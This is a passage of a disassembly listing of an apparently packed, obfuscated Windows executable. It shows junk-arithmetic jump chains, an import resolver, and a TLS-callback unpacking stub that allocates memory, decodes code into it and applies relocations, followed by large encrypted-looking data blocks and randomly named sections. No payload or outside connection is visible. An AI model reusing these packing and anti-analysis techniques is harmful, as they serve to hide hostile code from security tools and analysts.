; ---------------------------------------------------------------------------
loc_4328A5: ; CODE XREF: fzj3qwht:loc_42F29D�j
sub eax, 94F019B0h
add eax, 0D552A4BAh
add eax, ebp
jmp loc_4313A4
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4328BA proc near ; CODE XREF: sub_430E46-14E9�p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg esi, [esp-4+arg_0]
mov ebp, esi
jmp near ptr dword_42E9A4+10h
sub_4328BA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_4328CA: ; CODE XREF: fzj3qwht:00430F73�j
xchg eax, [esp]
xchg edi, [esp]
mov eax, edi
pop edi
xchg edx, [esp]
mov ebx, edx
jmp near ptr dword_42EA44+5Bh
; ---------------------------------------------------------------------------
align 2
pop edi
call sub_42FF04
loc_4328E4: ; CODE XREF: fzj3qwht:0043216A�j
jmp loc_430828
; ---------------------------------------------------------------------------
align 2
dw 0F081h
dd 0E8B59D80h, 6857C503h, 741D8D61h, 0FFE754E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_4328FE: ; DATA XREF: sub_431167+16BA�o
push 0D9FD5675h
pop ebx
sub ebx, 52BFC610h
xor ebx, 1873F1D0h
sub ebx, 59B767F3h
xor ebx, 23AAC197h
call sub_430C8C
; START OF FUNCTION CHUNK FOR sub_431686
loc_432921: ; CODE XREF: sub_431686+F�j
pop edx
rol edx, 12h
sub edx, 6A3C455Bh
rol edx, 9
or edx, 3B952D31h
call sub_4318E2
rol ebx, 8
xchg edi, [esp+0]
pop edi
cmp dword ptr [ebp-8], 0
jnz loc_430B7C
jmp loc_431890
; END OF FUNCTION CHUNK FOR sub_431686
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 81h
; ---------------------------------------------------------------------------
shr byte ptr [edi-5Bh], 0A9h
stc
loc_432959: ; DATA XREF: fzj3qwht:00432323�o
jno short $+2
mov al, [ebp+eax-20h]
push 8F379504h
jmp loc_42F53C
; ---------------------------------------------------------------------------
db 0B9h, 0ECh, 0Dh
dd 0EE90043h, 5BFFFFEFh, 8104C3C1h, 0FA19ACBh, 37C38179h
dd 0C17165BEh, 0F3810CC3h, 94E90FB8h, 0FFC18EE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432992 proc near ; CODE XREF: fzj3qwht:loc_42E83C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00432AE7 SIZE 0000000B BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push esi
push edi
push ebx
mov esi, offset dword_422000
mov eax, 400000h
mov [ebp+var_4], eax
mov edx, eax
loc_4329AA: ; CODE XREF: sub_432992+15B�j
mov eax, [esi+0Ch]
or eax, eax
jz loc_432A42
add eax, edx
mov ebx, eax
push eax
call ds:dword_42A0B4 ; GetModuleHandleA
or eax, eax
jnz loc_4329D7
push ebx
call ds:dword_42A0B8 ; LoadLibraryA
or eax, eax
jz loc_432A3A
loc_4329D7: ; CODE XREF: sub_432992+30�j
mov [ebp+var_8], eax
push 0
pop [ebp+var_C]
loc_4329DF: ; CODE XREF: sub_432992+A2�j
mov eax, [esi]
or eax, eax
mov edx, [ebp+var_4]
jnz loc_4329EF
mov eax, [esi+10h]
loc_4329EF: ; CODE XREF: sub_432992+54�j
add eax, edx
add eax, [ebp+var_C]
mov ebx, [eax]
mov edi, [esi+10h]
add edi, edx
add edi, [ebp+var_C]
or ebx, ebx
jz loc_432AE7
test ebx, 80000000h
jnz loc_432A16
lea ebx, [ebx+edx+2]
loc_432A16: ; CODE XREF: sub_432992+7A�j
and ebx, 7FFFFFFFh
push ebx
push [ebp+var_8]
call ds:dword_42A0BC ; GetProcAddress
or eax, eax
jz loc_432A3A
mov [edi], eax
add [ebp+var_C], 4
jmp loc_4329DF
; ---------------------------------------------------------------------------
align 2
loc_432A3A: ; CODE XREF: sub_432992+3F�j
; sub_432992+96�j
push ebx
mov eax, ebx
call sub_432A49
loc_432A42: ; CODE XREF: sub_432992+1D�j
pop ebx
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_432992 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432A49 proc near ; CODE XREF: sub_432992+AB�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
mov [ebp+var_104], eax
mov [ebp+var_100], 276E6143h
mov [ebp+var_FC], 6F6C2074h
mov [ebp+var_F8], 206461h
mov [ebp+var_108], 0Bh
loc_432A80: ; CODE XREF: sub_432A49+98�j
mov eax, [ebp+var_104]
cmp byte ptr [eax], 0
jnz loc_432AC0
mov eax, [ebp+var_108]
mov byte ptr [ebp+eax+var_100], 0
push 2010h
push 0
lea eax, [ebp+var_100]
push eax
push 0
call ds:dword_42A104 ; MessageBoxA
push 0FFFFFFFFh
call ds:dword_42A0C0 ; ExitProcess
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
loc_432AC0: ; CODE XREF: sub_432A49+40�j
mov eax, [ebp+var_108]
mov edx, [ebp+var_104]
mov dl, [edx]
mov byte ptr [ebp+eax+var_100], dl
inc [ebp+var_108]
inc [ebp+var_104]
jmp loc_432A80
sub_432A49 endp
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_432992
loc_432AE7: ; CODE XREF: sub_432992+6E�j
add esi, 14h
mov edx, [ebp+var_4]
jmp loc_4329AA
; END OF FUNCTION CHUNK FOR sub_432992
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD "+" TO EXPAND]
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_432AF7 proc near ; CODE XREF: start�p TlsCallback_0�p
mov eax, offset loc_42E77C
locret_432AFC: ; DATA XREF: sub_432AFD+8�o
retn
sub_432AF7 endp
; =============== S U B R O U T I N E =======================================
sub_432AFD proc near ; DATA XREF: fzj3qwht:00432488�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push esi
push edi
push ecx
push ebx
push eax
mov ebx, [esp+14h+var_14]
sub ebx, offset locret_432AFC
mov eax, 3552h
push eax
push 4
push 1000h
push eax
push 0
mov eax, offset dword_42A0C4
mov eax, [eax+ebx]
call eax
pop ecx
mov edx, offset loc_42E77C
add edx, ebx
push edx
push ebx
push eax
mov edi, eax
mov esi, edx
cld
rep movsb
mov ecx, offset sub_42E5F8
add ecx, ebx
call ecx
pop eax
mov ebx, [esp+10h+var_10]
push 8000h
push 0
push eax
mov eax, 42A0C8h
mov eax, [eax+ebx]
call eax
pop ecx
pop eax
pop ebx
sub ebx, 5
mov byte ptr [ebx], 0B8h
inc ebx
mov [ebx], eax
add ebx, 4
mov byte ptr [ebx], 0C3h
or ecx, ecx
jz short loc_432BB2
mov ebx, eax
call loc_432C13
cld
lodsd
cmp eax, 0FFFFFFFFh
jz short loc_432BB2
push ebx
mov ebx, ecx
loc_432B7D: ; CODE XREF: sub_432AFD+91�j
; sub_432AFD+A4�j ...
add ebx, eax
add [ebx], ecx
add ebx, 4
lodsb
cmp al, 0FEh
jnb short loc_432B90
and eax, 0FFh
jmp short loc_432B7D
; ---------------------------------------------------------------------------
loc_432B90: ; CODE XREF: sub_432AFD+8A�j
add ebx, 0FEh
or eax, eax
jp short loc_432BA3
lodsw
and eax, 0FFFFh
jmp short loc_432B7D
; ---------------------------------------------------------------------------
loc_432BA3: ; CODE XREF: sub_432AFD+9B�j
lodsd
dec esi
and eax, 0FFFFFFh
cmp eax, 0FFFFFFh
jnz short loc_432B7D
pop eax
loc_432BB2: ; CODE XREF: sub_432AFD+6D�j
; sub_432AFD+7B�j
pop ebx
pop ecx
pop edi
pop esi
retn
sub_432AFD endp
; ---------------------------------------------------------------------------
db 71h
dd 0ECA4C4B5h, 16CD4F1Dh, 1214CA77h, 7C5A5B5Fh, 5C369DC3h
dd 0B35F1167h, 0F1DD2A88h, 0E01A34A4h, 46CD7BACh, 8B8D7E9Ch
dd 6F9E4CFh, 0CE8FD41Eh, 0F1840A2Ch, 907FE463h, 183465A4h
dd 6766B1CAh
; ---------------------------------------------------------------------------
sbb cl, 0Dh
; =============== S U B R O U T I N E =======================================
public start
start proc near
call sub_432AF7
add eax, 3A21h
jmp eax
start endp
; =============== S U B R O U T I N E =======================================
public TlsCallback_0
TlsCallback_0 proc near ; DATA XREF: fzj3qwht:TlsCallbacks�o
call sub_432AF7
add eax, 3652h
jmp eax
TlsCallback_0 endp
; ---------------------------------------------------------------------------
loc_432C13: ; CODE XREF: sub_432AFD+71�p
call sub_432C1C
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh
; =============== S U B R O U T I N E =======================================
sub_432C1C proc near ; CODE XREF: fzj3qwht:loc_432C13�p
pop esi
retn
sub_432C1C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 4400h
dd 5B3EDAD7h, 412498DAh, 0F0F31623h, 3856BBF4h, 607FD985h
dd 8DB84176h, 0AE996ACDh, 3FDA4F69h, 0BAF4909Eh, 0DF2262ADh
dd 406D6A1Fh, 0CD405B75h, 0D8A9E18Ch, 0D129EDh, 6A986F79h
dd 21525096h, 88696278h, 14E2E870h, 6ECA8AA6h, 5A2DA0D3h
dd 0D73ABF70h, 3A5656A8h, 0FEEFDBDDh, 90FAC4E3h, 0D72C351Bh
dd 0BC6807BFh, 235A3818h, 0AC513EA8h, 3C231832h, 0F87B5308h
dd 0A07AF8FEh, 6B95396Ch, 5DFB0866h, 4CDF600Bh, 0EA862C62h
dd 45B0A381h, 0EA70DB2Bh, 1F39173Eh, 186C70BCh, 0C8CE76C0h
dd 869F4C06h, 0A5972B87h, 39901101h, 7C44CDB5h, 0DBDA524Eh
dd 0BC42CEDAh, 1D74815Bh, 0BBC0A223h, 2B04BE05h, 0B2465399h
dd 83293B8Fh, 85E2A6B4h, 618719D3h, 94537716h, 0D4276967h
dd 8688FCFh, 0EC769E6Dh, 524C9C95h, 92FAE5EFh, 76629C2h
dd 3A8AA89Bh, 878A8CA2h, 17FC0B92h, 8165106Eh, 17EA2E43h
dd 0B57826D2h, 0DF173313h, 0E7683F03h, 0F73CDBD0h, 6BE5F018h
dd 0CDDC7147h, 91672DAEh, 0BB63C025h, 0D164FE33h, 627BBDAFh
dd 5EB21B3Ch, 0D26BF6ABh, 132BDD4Dh, 0B6D33AE7h, 8B4F83F3h
dd 0A84AE68Ah, 5CE03F76h, 0B15FC6AAh, 93A6784Fh, 59FB43E8h
dd 0B78D8581h, 79CBD223h, 51CFF99h, 9F27F404h, 0AE20EE5Bh
dd 572D1752h, 0A9DC8BE9h, 0ED8D4A5Ah, 0DC111DEFh, 96668384h
dd 4779B786h, 0B6A1C373h, 0EBA8BC88h, 0C3D0B703h, 9F3771Ah
dd 0D34D1169h, 4895A016h, 0FCEA58A1h, 0FA72E5FDh, 0A7B18E38h
dd 811BC240h, 0B5A029C7h, 0BF3AF0BBh, 59ABB1Ch, 0C3A0C780h
dd 0A53CB0B2h, 0D7620EDh, 5A212085h, 0F54AF50h, 9436BF69h
dd 49D2A841h, 60B02B3Dh, 25F742F6h, 79AD21D4h, 807CC78h
dd 80h dup(0)
fzj3qwht ends
; Section 6. (virtual address 00033000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00033000
; Flags 40000080: Bss Readable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read
_0niaacah segment para public 'BSS' use32
assume cs:_0niaacah
;org 433000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0AB5E1283h, 0EE2E4F85h, 0A21AF640h, 187E1BA7h, 442A8D2Eh
dd 592EED57h, 0F54F8ADCh, 0C5B27650h, 0C19BA443h, 0F0D7F9A6h
dd 8434B2D9h, 0FABFA5B4h, 0B700B523h, 38221697h, 9253B481h
dd 13F51AF6h, 0B4AB90EBh, 0AAD48554h, 0AA2F0602h, 4262E9C1h
dd 0C1667B4Eh, 64E7AE3Bh, 0BB199E62h, 54C76A68h, 8320F216h
dd 29E00987h, 0BB1B305h, 524EFF69h, 0E47CEC4Ah, 0EDE67963h
dd 0A5F2C3Eh, 32D8AB12h, 0B0B3DBFFh, 0D6D32A50h, 0F3607458h
dd 3CCD17E3h, 7E118CA7h, 377C6056h, 3794AA30h, 9FC2AB4h
dd 842B5C0Ah, 0EB304762h, 410249BDh, 0DFCA4BF8h, 40748234h
dd 0E062B084h, 0E3024343h, 0A2E3269Dh, 211F3384h, 0E334B12Ch
dd 43BE7CF8h, 6006936Ch, 0C520A37h, 2BFA848Eh, 8B70E934h
dd 5F306E66h, 97B4471Dh, 679FC261h, 155E6029h, 0A70393D6h
dd 0DE35895Dh, 2726E003h, 0F1DE01BCh, 11A7180Ah, 7292659Bh
dd 0F71F23CCh, 0BE47F394h, 0A51B3BBEh, 5C2424CCh, 5824025Ah
dd 0CD8B64AFh, 0B1EB4CA0h, 0DE472A41h, 414DB42Eh, 3EC8C72h
dd 0FB812DA4h, 82603D9h, 834FCA46h, 7225FB86h, 0EA46B8C7h
dd 0C00D4BD8h, 972AC96Ah, 0CE002559h, 4F752881h, 0D70A7ACCh
dd 1BD3FA40h, 87526E87h, 0DDF4433h, 3725B715h, 71C13CEBh
dd 74028A51h, 551A2423h, 0E9BCF3BBh, 234C2CF8h, 1C76D1ABh
dd 0EAAF6A51h, 27FA2DF2h, 59CC520Ch, 6A22D6C7h, 5E1BAF01h
dd 0EA6AAA9Dh, 4E9ECF3Bh, 9655DF51h, 5680EF5Bh, 59930D8Dh
dd 0E4304007h, 394BF5D9h, 1BE2B0C7h, 0F617F2DDh, 179AFE4Eh
dd 644054Eh, 9E319C09h, 0BF9BC967h, 23F32ED5h, 7F34216Dh
dd 3775BBCAh, 2C2AFAA9h, 0D7498025h, 6259D11Bh, 12084A33h
dd 7C42A872h, 79C47E87h, 36ED56A9h, 72E26D14h, 55133D51h
dd 17B7DC52h, 0B79BE0Ch, 0EDD9B88Dh, 380h dup(0)
_0niaacah ends
; Section 7. (virtual address 00034000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00034000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 434000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start